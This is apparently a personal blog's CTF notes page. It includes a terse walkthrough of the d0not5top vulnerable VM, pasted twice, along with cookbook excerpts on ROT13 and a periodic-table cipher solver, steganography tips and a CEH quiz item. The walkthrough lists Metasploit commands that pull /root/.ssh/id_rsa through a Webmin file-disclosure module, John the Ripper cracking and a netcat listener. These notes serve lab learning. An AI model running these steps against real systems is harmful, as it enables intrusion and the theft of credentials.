I used grep
grep -i -r "string" /directory
-i to accept lowercase and uppercase
-r recursive __ look for all folders inside the main folder
Showing posts with label CTF. Show all posts
Showing posts with label CTF. Show all posts
Saturday, August 19, 2017
Using Atbash cipher to decrypt the CTF - Level 06
I used this website to discover because If we test all the crypto tools, it will take too much time, this website does several analysis at the same time.
http://www.elfqrin.com/codecracker.php
Sunday, August 13, 2017
hack-d0not5top-vm-ctf-challenge
netdiscover
nmap -sV IP
visit the ip address
scan the webcontet using
dirb http://IP
check the folder - normally control, admin and check the
source code - FLAG number 1 founded = FL46_1
Binary code to converted into Decimal
netcat very verbrose
nc -vv IP
www.asciitohex.com - hexadecimal
brain fuck encoding
splitbrain.org/services/ook
obfuscation/encoding
add the code.ctf to the /etc/hosts as
IP and filename.ctf
dirb http://g4m35.ctf/H3x6L64m3/ /usr/share/wordlists/dirb/big.txt
cryptii.com/octal/text
interpret as octal convert to text
without the \
to access another terminal - use grep* and password the ctf name
exiftool - into an image and analyze the content.
john –wordlist=/usr/share/wordlists/rockyou.txt donotstop
john --wordlist=/usr/share/wordlists/rockyou.txt ignite
ssh username@IP
rbash shell
suedoh -l
surdoh /usr/bin/wmstrt
for i in {i..9999..1};do echo $(suedoh /usr/bin/wmstrt&);done
msf> use auxiliary/admin/webmin/file_disclosure
msf> auxiliary (file_disclosure) > set lhost 192.168.1.113
msf> auxiliary (file_disclosure) > set ssl true
msf> auxiliary (file_disclosure) > set rpath /root/.ssh/id_rsa
msf> auxiliary (file_disclosure) > exploit
ssh2john id_rsa> ignite
john --wordlist:/usr/share/wordlists/rockyou.txt ignite
nc -lp 1234 –vv
http://www.hackingarticles.in/hack-d0not5top-vm-ctf-challenge/
nmap -sV IP
visit the ip address
scan the webcontet using
dirb http://IP
check the folder - normally control, admin and check the
source code - FLAG number 1 founded = FL46_1
Binary code to converted into Decimal
netcat very verbrose
nc -vv IP
www.asciitohex.com - hexadecimal
brain fuck encoding
splitbrain.org/services/ook
obfuscation/encoding
add the code.ctf to the /etc/hosts as
IP and filename.ctf
dirb http://g4m35.ctf/H3x6L64m3/ /usr/share/wordlists/dirb/big.txt
cryptii.com/octal/text
interpret as octal convert to text
without the \
to access another terminal - use grep* and password the ctf name
exiftool - into an image and analyze the content.
john –wordlist=/usr/share/wordlists/rockyou.txt donotstop
john --wordlist=/usr/share/wordlists/rockyou.txt ignite
ssh username@IP
rbash shell
suedoh -l
surdoh /usr/bin/wmstrt
for i in {i..9999..1};do echo $(suedoh /usr/bin/wmstrt&);done
msf> use auxiliary/admin/webmin/file_disclosure
msf> auxiliary (file_disclosure) > set lhost 192.168.1.113
msf> auxiliary (file_disclosure) > set ssl true
msf> auxiliary (file_disclosure) > set rpath /root/.ssh/id_rsa
msf> auxiliary (file_disclosure) > exploit
ssh2john id_rsa> ignite
john --wordlist:/usr/share/wordlists/rockyou.txt ignite
nc -lp 1234 –vv
http://www.hackingarticles.in/hack-d0not5top-vm-ctf-challenge/
Saturday, August 12, 2017
Social Engineering and Encoding with ROT13
One example of this I recently saw in real life was at Defcon 18. I was part of the team that brought the Social Engineering CTF to Defcon. We saw many contestants who used the pretext of an internal employee. When presented with an objection like, “What is your employee badge number?” an unskilled social engineer would get nervous and either not have an answer or hang up, whereas a skilled social engineer would bring those dissonant beliefs into alignment for the target. Simply stating a badge number they found online or using another method they were able to convince the target that information was not needed, therefore aligning the target to their beliefs. These points are very technical answers to a very simple problem, but you must understand that one can do only so much fake. Choose your path wisely.
Social Engineering: The Art of HumanHacking Published by Wiley publishing, Inc.
Copyright©2011 by Christopher Hadnagy
----------------
Python Web Penetration Testing Cookbook
Encoding with ROT13
ROT13 encoding is definitely not the most secure method of encoding anything. Typically, ROT13 was used many years ago to hide offensive jokes on forums as a kind of Not Safe For Work (NSFW) tag so people wouldn't instantly see the remark. These days, it's mostly used within Capture The Flag (CTF) challenges, and you'll find out why.
Getting ready
For this script, we will need quite specific modules. We will be needing the maketrans feature, and the lowercase and uppercase features from the string module.
How to do it…
To use the ROT13 encoding method, we need to replicate what the ROT13 cipher actually does. The 13 indicates that each letter will be moved 13 places along the alphabet scale, which makes the encoding very easy to reverse:
from string import maketrans, lowercase, uppercase
def rot13(message):
lower = maketrans(lowercase, lowercase[13:] + lowercase[:13])
upper = maketrans(uppercase, uppercase[13:] + uppercase[:13])
return message.translate(lower).translate(upper)
message = raw_input('Enter :')
print rot13(message)
How it works…
This is the first of our scripts that doesn't simply require the hashlib module; instead it requires specific features from a string. We can import these using the following:
from string import maketrans, lowercase, uppercase
Next, we can create a block of code to do the encoding for us. We use the maketrans feature of Python to tell the interpreter to move the letters 13 places across and to keep uppercase within the uppercase and lower within the lower. We then request that it returns the value to us:
def rot13(message):
lower = maketrans(lowercase, lowercase[13:] + lowercase[:13])
upper = maketrans(uppercase, uppercase[13:] + uppercase[:13])
return message.translate(lower).translate(upper)
We then need to ask the user for some input so we have a string to work with; this is done in
the traditional way:
message = raw_input('Enter :')
Once we have the user input, we can then print out the value of our string being passed through our rot13 block of code:
print rot13(message)
The following is an example of the code in use:
Enter :This is an example of encoding in Python
Guvf vf na rknzcyr bs rapbqvat va Clguba
Cracking a substitution cipher
The following is an example of a real-life scenario that was recently encountered. A substitution cipher is when letters are replaced by other letters to form a new, hidden message. During a CTF that was hosted by "NullCon" we came across a challenge that looked like a substitution cipher.
The challenge was:
Find the key:
TaPoGeTaBiGePoHfTmGeYbAtPtHoPoTaAuPtGeAuYbGeBiHoTaTmPtHoTmGePoAuGe
ErTaBiHoAuRnTmPbGePoHfTmGeTmRaTaBiPoTmPtHoTmGeAuYbGeTbGeLuTmPtTm
PbTbOsGePbTmTaLuPtGeAuYbGeAuPbErTmPbGeTaPtGePtTbPoAtPbTmGeTbPtEr
GePoAuGeYbTaPtErGePoHfTmGeHoTbAtBiTmBiGeLuAuRnTmPbPtTaPtLuGePoHf
TaBiGeAuPbErTmPbPdGeTbPtErGePoHfTaBiGePbTmYbTmPbBiGeTaPtGeTmTlAt
TbOsGeIrTmTbBiAtPbTmGePoAuGePoHfTmGePbTmOsTbPoTaAuPtBiGeAuYbGeIr
TbPtGeRhGeBiAuHoTaTbOsGeTbPtErGeHgAuOsTaPoTaHoTbOsGeRhGeTbPtErGe
PoAuGePoHfTmGeTmPtPoTaPbTmGeAtPtTaRnTmPbBiTmGeTbBiGeTbGeFrHfAuOs
TmPd
Getting ready
For this script, there is no requirement for any external libraries.
How to do it…
To solve this problem, we run our string against values in our periodic dictionary and transformed the discovered values into their ascii form. This in returned the output of our final answer:
string =
"TaPoGeTaBiGePoHfTmGeYbAtPtHoPoTaAuPtGeAuYbGeBiHoTaTmPtHoTmGePoA
uGeErTaBiHoAuRnTmPbGePoHfTmGeTmRaTaBiPoTmPtHoTmGeAuYbGeTbGeLuTmP
tTmPbTbOsGePbTmTaLuPtGeAuYbGeAuPbErTmPbGeTaPtGePtTbPoAtPbTmGeTbP
tErGePoAuGeYbTaPtErGePoHfTmGeHoTbAtBiTmBiGeLuAuRnTmPbPtTaPtLuGeP
oHfTaBiGeAuPbErTmPbPdGeTbPtErGePoHfTaBiGePbTmYbTmPbBiGeTaPtGeTmT
lAtTbOsGeIrTmTbBiAtPbTmGePoAuGePoHfTmGePbTmOsTbPoTaAuPtBiGeAuYbG
eIrTbPtGeRhGeBiAuHoTaTbOsGeTbPtErGeHgAuOsTaPoTaHoTbOsGeRhGeTbPtE
rGePoAuGePoHfTmGeTmPtPoTaPbTmGeAtPtTaRnTmPbBiTmGeTbBiGeTbGeFrHfA
uOsTmPd"
n=2
list = []
answer = []
[list.append(string[i:i+n]) for i in range(0, len(string), n)]
print set(list)
periodic ={"Pb": 82, "Tl": 81, "Tb": 65, "Ta": 73, "Po": 84, "Ge":
32, "Bi": 83, "Hf": 72, "Tm": 69, "Yb": 70, "At": 85, "Pt": 78,
"Ho": 67, "Au": 79, "Er": 68, "Rn": 86, "Ra": 88, "Lu": 71,
"Os": 76, "Tl": 81, "Pd": 46, "Rh": 45, "Fr": 87, "Hg": 80,
"Ir": 77}
for value in list:
if value in periodic:
answer.append(chr(periodic[value]))
lastanswer = ''.join(answer)
print lastanswer
How it works…
To start this script off, we first defined the key string within the script. The n variable was then
defined as 2 for later use and two empty lists were created— list and answer:
string = --snipped--
n=2
list = []
answer = []
We then started to create the list, which ran through the string and pulled out the sets of two
letters and appended them to the list value, which was then printed:
[list.append(string[i:i+n]) for i in range(0, len(string), n)]
print set(list)
Each of the two letters corresponded to a value in the periodic table, which relates to a
number. Those numbers when transformed into ascii related to a character. Once this was
discovered, we needed to map the elements to their periodic number and store that:
periodic ={"Pb": 82, "Tl": 81, "Tb": 65, "Ta": 73, "Po": 84, "Ge":
32, "Bi": 83, "Hf": 72, "Tm": 69, "Yb": 70, "At": 85, "Pt": 78,
"Ho": 67, "Au": 79, "Er": 68, "Rn": 86, "Ra": 88, "Lu": 71,
"Os": 76, "Tl": 81, "Pd": 46, "Rh": 45, "Fr": 87, "Hg": 80,
"Ir": 77}
We are then able to create a loop that will go through the list of elements that we previously
created and named as list, and map them to the value in the periodic set of data that we
created. As this is running, we can have it append the findings into our answer string while
transforming the ascii number to the relevant letter:
for value in list:
if value in periodic:
answer.append(chr(periodic[value]))
Finally, we need to have the data printed to us:
lastanswer = ''.join(answer)
print lastanswer
Here is an example of the script running:
set(['Pt', 'Pb', 'Tl', 'Lu', 'Ra', 'Pd', 'Rn', 'Rh', 'Po', 'Ta', 'Fr', 'Tb', 'Yb', 'Bi', 'Ho', 'Hf', 'Hg', 'Os', 'Ir', 'Ge', 'Tm', 'Au', 'At', 'Er'])
IT IS THE FUNCTION OF SCIENCE TO DISCOVER THE EXISTENCE OF A GENERAL
REIGN OF ORDER IN NATURE AND TO FIND THE CAUSES GOVERNING THIS
ORDER. AND THIS REFERS IN EQUAL MEASURE TO THE RELATIONS OF MAN -
SOCIAL AND POLITICAL - AND TO THE ENTIRE UNIVERSE AS A WHOLE.
Friday, August 11, 2017
Look for steganography software on the suspect’s computer and CTF
A blatant clue is finding stego-creating software on the suspect’s computer. The trick is to recognize the different types (experience is needed here) or known hash values of stego software using hash analysis. Many investigators have no clue how many steganographic software packages exist and may overlook the software as being “just part of the system.” The software JPHS for Windows can decrypt some images. Notice that the software gives you details about the original file, the hidden file, and, toward the bottom, the new file with the stego.
Use stego detection software. Software such as Gargoyle (www.tucofs.com) can be used to detect files that have steganographic signatures. They may not always detect it, though, if a new algorithm was used or the algorithm is so good that it escapes detection.
Yes, sometimes you get a question that’s relatively easy, and this is a prime example. Hiding files is exactly what it sounds like—find a way to hide files on the system. There are innumerable ways to accomplish this, but steganography (which includes hiding all sorts of stuff inside images, video, and such) and NTFS file streaming are the two you’ll most likely see referenced on the exam from the Ethical hacker CEH.
Which of the following tools can assist in discovering the use of NTFS file streams? (Choose all that apply.)
A. LADS B. ADS Spy C. Sfind D. Snow
A , B , C . NTFS streaming (alternate data streaming) isn’t a huge security problem, but it is something many security administrators concern themselves with. If you want to know where it’s going on, you can use any of these tools: LADS and ADS Spy are freeware tools that list all alternate data streams of an NTFS directory. ADS Spy can also remove alternate data streams (ADS) from NTFS file systems. Sfind, probably the oldest one here, is a Foundstone forensic tool you can use for finding ADS. As an aside, dir /R on Windows systems does a great job of pointing these out.
D is incorrect because Snow is a steganography tool used to conceal messages in ASCII text by appending whitespace to the end of lines.
D is incorrect because Snow is a steganography tool used to conceal messages in ASCII text by appending whitespace to the end of lines.
CTF – from cyberspace game.
To resolve the CTF – finding the flag for this specific image founded in the source code with a different name, I used this sequence to find the hidden message in the image:
first – download the stegsolve on linux
chmod +x stegsolve.jar /* to give authority to the program.
mkdir bin – create a directory
mv stegsolve.jar bin/ - move to the folder
to run the .jar file – do:
java –jar jarfilename.jar
if you image is compressed, do:
unrar e yourfilename.rar
I clicked in stegsolve- menu analyze – file format and I found the flag, but you can play here to find more information in different files.
Recommended reading
For anyone interested in the history of code making and code breaking, the book to read is [KAHN96]. Although it is concerned more with the impact of cryptology than its technical development, it is an excellent introduction and makes for exciting reading. Another excellent historical account is [SING99].
A short treatment covering the techniques of this chapter, and more, is [GARD72]. There are many books that cover classical cryptography in a more technical vein; one of the best is [SINK09]. [KORN96] is a delightful book to read and contains a lengthy section on classical techniques. Two cryptography books that contain a fair amount of technical material on classical techniques are [GARR01] and [NICH99]. For the truly interested reader, the two-volume [NICH96] covers numerous classical ciphers in detail and provides many ciphertexts to be cryptanalyzed, together with the solutions. An excellent treatment of rotor machines, including a discussion of their cryptanalysis is found in [KUMA97]. [KATZ00] provides a thorough treatment of steganography. Another good source is [WAYN09].
GARD72 Gardner, M. Codes, Ciphers, and Secret Writing. New York: Dover, 1972.
GARR01 Garrett, P. Making, Breaking Codes: An Introduction to Cryptology. Upper
Saddle River, NJ: Prentice Hall, 2001.
KAHN96 Kahn, D. The Codebreakers: The Story of Secret Writing. New York:
Scribner, 1996.
KATZ00 Katzenbeisser, S., ed. Information Hiding Techniques for Steganography and
Digital Watermarking. Boston: Artech House, 2000.
KORN96 Korner, T. The Pleasures of Counting. Cambridge, England: Cambridge
University Press, 1996.
KUMA97 Kumar, I. Cryptology. Laguna Hills, CA: Aegean Park Press, 1997.
NICH96 Nichols, R. Classical Cryptography Course. Laguna Hills, CA: Aegean Park
Press, 1996.
NICH99 Nichols, R., ed. ICSA Guide to Cryptography. New York: McGraw-Hill, 1999.
SING99 Singh, S. The Code Book: The Science of Secrecy from Ancient Egypt to
Quantum Cryptography. New York: Anchor Books, 1999.
SINK09 Sinkov, A., and Feil, T. Elementary Cryptanalysis: A Mathematical Approach.
Washington, D.C.: The Mathematical Association of America, 2009.
WAYN09 Wayner, P. Disappearing Cryptography. Boston: AP Professional Books,
2009.
Subscribe to:
Posts (Atom)